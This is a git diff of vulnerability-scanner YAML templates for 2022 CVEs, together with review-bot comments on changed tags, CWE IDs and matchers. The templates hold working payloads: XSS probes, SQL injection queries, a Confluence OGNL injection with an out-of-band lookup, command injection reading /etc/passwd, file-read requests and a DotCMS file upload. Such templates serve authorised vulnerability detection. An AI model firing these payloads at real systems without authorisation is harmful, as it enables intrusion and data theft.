@@ -41,9 +29,7 @@ http: - '"></script><script>alert(document.domain)</script>' - '"Not authenticated"' condition: and - - type: word part: header words: - text/html -# digest: 490a0046304402206e8212c2043ed4a8b88abd42a101c0d8c045fb5afddc911efa265f7eeee23ef5022020bd3e5c6e004eece668575a900995776f0edf3c543befd401df3f0c2ca12931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-25323.yaml b/poc/cve/CVE-2022-25323.yaml index 4b47492607..ddcbfa8506 100644 --- a/poc/cve/CVE-2022-25323.yaml +++ b/poc/cve/CVE-2022-25323.yaml 
@@ -1,48 +1,24 @@ id: CVE-2022-25323 - info: - name: ZEROF Web Server 2.0 - Cross-Site Scripting + name: ZEROF Web Server 2.0 XSS author: pikpikcu severity: medium - description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0. + description: ZEROF Web Server 2.0 allows /admin.back XSS. reference: - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 - - https://awillix.ru - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-25323 - cwe-id: CWE-79 - epss-score: 0.00115 - epss-percentile: 0.4506 - cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: zerof - product: web_server tags: xss,cve,cve2022,zerof - -http: +requests: - method: GET path: - "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>" - matchers-condition: and matchers: - type: word part: body words: - 'back<img src=x onerror=alert(document.domain)>' - - - type: word - part: header - words: - - "text/html" - + condition: and - type: status status: - 401 -# digest: 490a00463044022067003ec38ecd09853a1a4899f61e6e1891110689b6b77815a59b87f193953942022039897fdefbc83fe10328ffb00b72f367e7f4eff4e140421b1b0777bba83badf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-26134.yaml b/poc/cve/CVE-2022-26134.yaml index 0495a8c0a8..0f5e4c501b 100644 --- a/poc/cve/CVE-2022-26134.yaml +++ b/poc/cve/CVE-2022-26134.yaml 
@@ -1,59 +1,45 @@ id: CVE-2022-26134 - info: name: Confluence - Remote Code Execution author: pdteam,jbertman severity: critical description: | Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability. - remediation: | - Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability. reference: - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ - https://jira.atlassian.com/browse/CONFSERVER-79016 - - http://packetstormsecurity.com/files/167431/Through-The-Wire-CVE-2022-26134-Confluence-Proof-Of-Concept.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-26134 - cwe-id: CWE-917 - epss-score: 0.97519 - epss-percentile: 0.99985 - cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* + cwe-id: CWE-74 metadata: - verified: true - max-request: 2 - vendor: atlassian - product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" - tags: packetstorm,cve,cve2022,confluence,rce,ognl,oast,kev - -http: + verified: "true" + tags: cve,cve2022,confluence,rce,ognl,oast,kev +requests: - method: GET path: - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/" - "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/" - stop-at-first-match: true - + req-condition: true matchers-condition: or matchers: - type: dsl dsl: - - 'contains(to_lower(header_1), "x-cmd-response:")' - + - 
'contains(to_lower(all_headers_1), "x-cmd-response:")' - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains(to_lower(response_2), "confluence")' condition: and - extractors: - type: kval + part: header kval: - "x_cmd_response" - part: header -# digest: 4a0a00473045022006affa053c4fcae2976f75d20b0b62a4911ef7a3701f040771944778b3c395d2022100e564ab928fa74f0703e220834147d93af92f273d089e3125f6ec1e860c8f5567:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/07/04 diff --git a/poc/cve/CVE-2022-26135.yaml b/poc/cve/CVE-2022-26135.yaml index f24f3f1cf7..6ec4be4593 100644 --- a/poc/cve/CVE-2022-26135.yaml +++ b/poc/cve/CVE-2022-26135.yaml @@ -1,4 +1,5 @@ id: CVE-2022-26135 + info: name: Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server author: dk4trin @@ -11,10 +12,12 @@ info: cvss-score: 7.5 cve-id: CVE-2020-14179 tags: cve,cve2022,atlassian,jira,ssrf + requests: - method: GET path: - "{{BaseURL}}/secure/Signup!default.jspa" + matchers-condition: and matchers: - type: word @@ -23,6 +26,7 @@ requests: - "Username" - "Password" condition: and + - type: status status: - 200 diff --git a/poc/cve/CVE-2022-26352.yaml b/poc/cve/CVE-2022-26352.yaml index 5f06544108..f75c2c3155 100644 --- a/poc/cve/CVE-2022-26352.yaml +++ b/poc/cve/CVE-2022-26352.yaml 
@@ -1,33 +1,18 @@ id: CVE-2022-26352 - info: name: DotCMS - Arbitrary File Upload author: h1ei1 severity: critical description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352 - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html - - https://groups.google.com/g/dotcms classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-26352 - cwe-id: CWE-22 - epss-score: 0.97484 - epss-percentile: 0.99966 - cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: dotcms - product: dotcms - tags: packetstorm,cve,cve2022,rce,dotcms,kev,fileupload,intrusive - -http: + tags: cve,cve2022,rce,dotcms +requests: - raw: - | POST /api/content/ HTTP/1.1 @@ -45,7 +30,7 @@ http: - | GET /{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}} - + req-condition: true matchers: - type: dsl dsl: @@ -53,4 +38,4 @@ http: - 'status_code_2 == 200' condition: and -# digest: 490a004630440220314e389674d917401154b2b9782e723e24c6d2f9967e7388fc879f3a856976d3022020c28a0202ed288d613d1c0b3179e34945ec911273f4d4266b949ab8ae00f119:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/05/19 diff --git a/poc/cve/CVE-2022-26564.yaml b/poc/cve/CVE-2022-26564.yaml index 96ef0f5d57..f95d08a217 100644 --- a/poc/cve/CVE-2022-26564.yaml +++ b/poc/cve/CVE-2022-26564.yaml 
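Review bot: The tag line in poc/cve/CVE-2022-26352.yaml becomes `cve,cve2022,rce,dotcms`, dropping `intrusive` and `fileupload` although the template still posts to `/api/content/` and then fetches `/{{randstr}}.jsp`. Operators who exclude intrusive templates by tag would now run a check that writes a file to the target. I would keep `tags: cve,cve2022,rce,dotcms,kev,fileupload,intrusive`. The first hunk also removes `cvss-score: 9.8` and `cwe-id: CWE-22`, which are worth retaining for triage. The upload request body lies between the hunks and is not visible.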
@@ -1,41 +1,29 @@ id: CVE-2022-26564 - info: - name: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting + name: HotelDruid Hotel Management Software 3.0.3 XSS author: alexrydzak severity: medium description: | - HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. + HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability. reference: - https://rydzak.me/2022/04/cve-2022-26564/ - - https://www.hoteldruid.com - https://nvd.nist.gov/vuln/detail/CVE-2022-26564 + - https://www.hoteldruid.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-26564 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40288 - cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* metadata: - max-request: 3 - vendor: digitaldruid - product: hoteldruid shodan-query: http.favicon.hash:-1521640213 tags: cve,cve2022,hoteldruid,xss - -http: +requests: - method: GET path: - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>' - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1' - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>' - stop-at-first-match: true - matchers-condition: and matchers: - type: word @@ -44,13 +32,10 @@ http: - "<script>javascript:alert('XSS')</script>" - "HotelDruid" condition: and - - type: word part: header words: - "text/html" - - type: status status: - 200 -# digest: 4a0a00473045022100fca650ea625815d7f969ec8643ea7f3884ec0a90c370a42ba7eddbd3e61d497a022049c0199716444475c96728c2852b5e3037515cdc0dcda788c85ae44c33f319a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
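Review bot: Removing `stop-at-first-match: true` in the first hunk means all three `path` entries are requested on every host even after one has already matched, which adds reflected-payload traffic per target without adding signal; I would keep `stop-at-first-match: true` after the path list. The new `description` also no longer names the affected parameter (`prezzoperiodo4` in `creaprezzi.php`), which is the detail someone fixing or filtering for this issue needs, and the `remediation` text is gone. Suggest restoring the old description sentence and the `remediation: |` block.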
diff --git a/poc/cve/CVE-2022-26960.yaml b/poc/cve/CVE-2022-26960.yaml index 21b4f71879..bf63cdbaa8 100644 --- a/poc/cve/CVE-2022-26960.yaml +++ b/poc/cve/CVE-2022-26960.yaml @@ -1,10 +1,13 @@ id: CVE-2022-26960 + info: name: elFinder <=2.1.60 - Local File Inclusion author: pikpikcu severity: critical description: | elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + remediation: | + Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability. reference: - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db @@ -15,22 +18,30 @@ info: cvss-score: 9.1 cve-id: CVE-2022-26960 cwe-id: CWE-22 + epss-score: 0.88417 + epss-percentile: 0.98392 + cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true + max-request: 1 + vendor: std42 + product: elfinder tags: cve,cve2022,lfi,elfinder -requests: + +http: - raw: - | GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/05 +# digest: 4a0a00473045022007974a80e96be3bad230604c73e77300a035917d8157638c79d98a0265875156022100b09af0fedbc3a7a90bf7a837847df6402958020c04abd9325d9da8dab8d14aaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-27927.yaml b/poc/cve/CVE-2022-27927.yaml index 2d123b1139..96820d1ca3 100644 --- a/poc/cve/CVE-2022-27927.yaml +++ b/poc/cve/CVE-2022-27927.yaml 
@@ -1,50 +1,38 @@ id: CVE-2022-27927 - info: name: Microfinance Management System 1.0 - SQL Injection author: lucasljm2001,ekrause severity: critical description: | Microfinance Management System 1.0 is susceptible to SQL Injection. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip - https://www.exploit-db.com/exploits/50891 - https://nvd.nist.gov/vuln/detail/CVE-2022-27927 - - https://www.sourcecodester.com/php/14822/microfinance-management-system.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-27927 cwe-id: CWE-89 - epss-score: 0.05754 - epss-percentile: 0.92551 - cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: microfinance_management_system_project - product: microfinance_management_system - tags: microfinance,edb,cve,cve2022,sqli + verified: "true" + tags: cve,cve2022,sqli,microfinance variables: num: "999999999" - -http: +requests: - raw: - | GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word part: body words: - '{{md5({{num}})}}' - - type: status status: - 200 -# digest: 490a004630440220464fd4c01065b9bf307cf48002af84c65e941dcc0f8493b08a814af23294b99702204524bc02e881442819d643814da6a51b66f04c1719bf73a1869747bdf519c277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/07/04 diff --git a/poc/cve/CVE-2022-28079.yaml b/poc/cve/CVE-2022-28079.yaml index 8124852465..748df78551 100644 --- a/poc/cve/CVE-2022-28079.yaml 
+++ b/poc/cve/CVE-2022-28079.yaml @@ -1,26 +1,37 @@ id: CVE-2022-28079 + info: - name: College Management System - SQL Injection + name: College Management System 1.0 - SQL Injection author: ritikchaddha severity: high description: | - College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter. + College Management System 1.0 contains a SQL injection vulnerability via the course code parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f - https://nvd.nist.gov/vuln/detail/CVE-2022-28079 - https://code-projects.org/college-management-system-in-php-with-source-code/ + - https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28079 cwe-id: CWE-89 + epss-score: 0.82978 + epss-percentile: 0.9811 + cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: college_management_system_project + product: college_management_system tags: cve,cve2022,sqli,cms,collegemanagement variables: num: "999999999" -requests: + +http: - raw: - | POST /admin/asign-single-student-subjects.php HTTP/1.1 
@@ -28,11 +39,14 @@ requests: Content-Type: application/x-www-form-urlencoded submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL# + matchers-condition: and matchers: - type: word words: - '{{md5({{num}})}}' + - type: status status: - 302 +# digest: 4a0a00473045022100e382bfbe8f04a47107ddb791cffb7f27bc5de487cc252068d37b77cb6d77a38402200148cd2a65d13065c5e6ea7b22866765374f310b918b808288cd8be7d80c90a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-28080.yaml b/poc/cve/CVE-2022-28080.yaml index 102d3d12c1..dc59377c75 100644 --- a/poc/cve/CVE-2022-28080.yaml +++ b/poc/cve/CVE-2022-28080.yaml 
@@ -1,34 +1,21 @@ id: CVE-2022-28080 - info: name: Royal Event - SQL Injection author: lucasljm2001,ekrause,ritikchaddha severity: high description: | - Royal Event is vulnerable to a SQL injection vulnerability. - remediation: | - To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. + Detects an SQL Injection vulnerability in Royal Event System reference: - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html + - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 - cwe-id: CWE-89 - epss-score: 0.01456 - epss-percentile: 0.85223 - cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: event_management_system_project - product: event_management_system - tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms,intrusive - -http: + tags: cve,cve2022,sqli,authenticated,cms,royalevent +requests: - raw: - | POST /royal_event/ HTTP/1.1 @@ -67,14 +54,12 @@ http: 01/01/2011 ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - + cookie-reuse: true matchers-condition: and matchers: - type: word words: - '{{md5("{{randstr}}")}}' - - type: status status: - 200 -# digest: 490a0046304402206cd10a1971d924c7bf214a8cd866c2ce47e1785ab940f77145d7f2aafa9c1b5602201a445e4a9e6c860516ee225bcf306114571359b98d3f4c4d7b826042ecdaf4fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2022-29014.yaml b/poc/cve/CVE-2022-29014.yaml index a3ac539646..8d1df858e8 100644 --- a/poc/cve/CVE-2022-29014.yaml +++ b/poc/cve/CVE-2022-29014.yaml @@ -1,31 +1,19 @@ id: CVE-2022-29014 - info: - name: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion + name: Razer Sila Gaming Router v2.0.441_api-2.0.418 - LFI author: edoardottt severity: high - description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files. - remediation: | - Apply the latest firmware update provided by Razer to fix the Local File Inclusion vulnerability. + description: A local file inclusion vulnerability in Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to read arbitrary files. reference: - https://www.exploit-db.com/exploits/50864 - https://nvd.nist.gov/vuln/detail/CVE-2022-29014 - - https://www2.razer.com/ap-en/desktops-and-networking/razer-sila - - https://packetstormsecurity.com/files/166683/Razer-Sila-2.0.418-Local-File-Inclusion.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29014 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-29014 - epss-score: 0.79717 - epss-percentile: 0.97981 - cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: razer - product: sila_firmware - tags: edb,packetstorm,cve,cve2022,razer,lfi,router - -http: + tags: cve,cve2022,razer,lfi,router +requests: - raw: - | POST /ubus/ HTTP/1.1 
@@ -33,14 +21,11 @@ http: Content-Type: application/x-www-form-urlencoded {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - - type: status status: - 200 -# digest: 4b0a00483046022100d681b2f0e48b356fce7028d4357f7e2819d0ed04dedaf9163341c6bb16ac2a55022100d6be2a1ed872e893e30d5f837dab6f346456b0c6194d761ee7148f5e0adc8c71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-29299.yaml b/poc/cve/CVE-2022-29299.yaml index 29d5098d23..7bec163c15 100644 --- a/poc/cve/CVE-2022-29299.yaml +++ b/poc/cve/CVE-2022-29299.yaml @@ -1,13 +1,10 @@ id: CVE-2022-29299 - info: name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting author: For3stCo1d severity: medium description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. - remediation: | - To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://www.exploit-db.com/exploits/50967 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299 @@ -15,15 +12,12 @@ info: cve-id: CVE-2022-29299 metadata: verified: true - max-request: 1 shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview,edb - -http: + tags: cve,cve2022,xss,solarview +requests: - method: GET path: - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6' - matchers-condition: and matchers: - type: word 
@@ -32,14 +26,12 @@ http: - '<script>alert(document.domain)</script><"">' - '/Solar_History.php" METHOD="post">' condition: and - - type: word part: header words: - "text/html" - - type: status status: - 200 -# digest: 4b0a004830460221009d43ac4959a7325c6f69198d1f4deed2badad16a8b12f0574e86dd9edbb3ee1f02210097baa8089139ece7b77d9102f25d6adfb31f9d4cfaa08609a37e6c9548ca8a01:922c64590222798bb761d5b6d8e72950 +# Enhanced by cs 06/21/2022 diff --git a/poc/cve/CVE-2022-29303.yaml b/poc/cve/CVE-2022-29303.yaml index e4b3983352..ba57eb25d5 100644 --- a/poc/cve/CVE-2022-29303.yaml +++ b/poc/cve/CVE-2022-29303.yaml @@ -1,37 +1,26 @@ id: CVE-2022-29303 - info: name: SolarView Compact 6.00 - OS Command Injection author: badboycxcc severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. - remediation: | - Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. reference: - https://www.exploit-db.com/exploits/50940 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing - - http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-29303 - cwe-id: CWE-78 - epss-score: 0.9555 - epss-percentile: 0.99216 - cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* + cwe-id: CWE-77 metadata: - verified: true - max-request: 1 - vendor: contec - product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" - tags: injection,solarview,edb,packetstorm,cve,cve2022,rce,kev + verified: "true" + tags: cve,cve2022,rce,injection,solarview variables: cmd: "cat${IFS}/etc/passwd" - -http: +requests: - raw: - | @timeout: 25s 
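Review bot: In the CVE-2022-29303 info block, `cwe-id: CWE-77` on the new side is less specific than the `CWE-78` it replaces and no longer agrees with the template name, which calls this an OS command injection; I would keep `cwe-id: CWE-78`. The same hunk drops `kev` from `tags`, so anyone prioritising results by that tag loses this finding from their high-priority set; suggest `tags: cve,cve2022,rce,injection,solarview,kev`. `verified: "true"` is also now a quoted string where the old side had the boolean `verified: true`, which may matter to tooling that filters on the field type.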
@@ -40,16 +29,10 @@ http: Content-Type: application/x-www-form-urlencoded mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M - - matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0" - - type: word - part: body - words: - - "p1_network_mail.cgi" -# digest: 4a0a00473045022100858afb5cdd23bcaf54aed234d7390fb4064452b82219b7a18f3089f8a014d59e02200655e5a73229f5871df0ae04f3a437094964d94da29e64799ed766138a111b95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/06/01 diff --git a/poc/cve/CVE-2022-29548.yaml b/poc/cve/CVE-2022-29548.yaml index f6b5e980e8..1a72d103fa 100644 --- a/poc/cve/CVE-2022-29548.yaml +++ b/poc/cve/CVE-2022-29548.yaml 
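Review bot: The matcher block for CVE-2022-29303 is weakened here: `matchers-condition: and` and the `word` matcher on `p1_network_mail.cgi` are removed, so a hit now depends only on the body regex `root:.*:0:0`. Any page that happens to contain a passwd-like line will be reported as a critical command injection on SolarView, which costs responders time on false positives. I would restore the second matcher so the finding is tied to the product's own response, as sketched below (indentation assumed, since the hunk's whitespace is not recoverable from this view).

```yaml
    matchers-condition: and
    matchers:
      # … unchanged: regex matcher on "root:.*:0:0" in body …

      - type: word
        part: body
        words:
          - "p1_network_mail.cgi"
```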
@@ -1,37 +1,52 @@ id: CVE-2022-29548 + info: - name: WSO2 Management Console - Reflected XSS + name: WSO2 - Cross-Site Scripting author: edoardottt severity: medium description: | - A reflected XSS issue exists in the Management Console of several WSO2 products. + WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. + remediation: | + Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html + - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1603/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-29548 cwe-id: CWE-79 + epss-score: 0.00299 + epss-percentile: 0.66119 + cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* metadata: - google-dork: inurl:"carbon/admin/login" - verified: "true" - tags: cve,cve2022,wso2,xss -requests: + verified: true + max-request: 1 + vendor: wso2 + product: api_manager + google-query: inurl:"carbon/admin/login" + tags: cve,cve2022,wso2,xss,packetstorm + +http: - method: GET path: - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + matchers-condition: 
and matchers: - type: word part: body words: - "CARBON.showWarningDialog('???');alert(document.domain)//???" + - type: word part: header words: - "text/html" + - type: status status: - 200 +# digest: 4b0a00483046022100b6c647cf81016609f95eb0b5625178cba66fbb69b9ca9e0f2d22e8e1b91ea560022100dacae7a43a2f04e2829f2552f3d9890689b6df3343ab32203c92610f7ae5b422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-30073.yaml b/poc/cve/CVE-2022-30073.yaml index d4790c7327..6ffd826db8 100644 --- a/poc/cve/CVE-2022-30073.yaml +++ b/poc/cve/CVE-2022-30073.yaml @@ -1,33 +1,23 @@ id: CVE-2022-30073 - info: - name: WBCE CMS 1.5.2 - Cross-Site Scripting + name: WBCE CMS v1.5.2 XSS Stored author: arafatansari severity: medium description: | - WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters. - remediation: | - Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability. + WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\user\save.php Display Name parameters. reference: - https://github.com/APTX-4879/CVE + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073 - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf - - https://nvd.nist.gov/vuln/detail/CVE-2022-30073 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-30073 cwe-id: CWE-79 - epss-score: 0.00195 - epss-percentile: 0.57281 - cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* metadata: - verified: true - max-request: 4 - vendor: wbce - product: wbce_cms + verified: "true" tags: cve,cve2022,wbcecms,xss - -http: +requests: - raw: - | POST /admin/login/index.php HTTP/1.1 
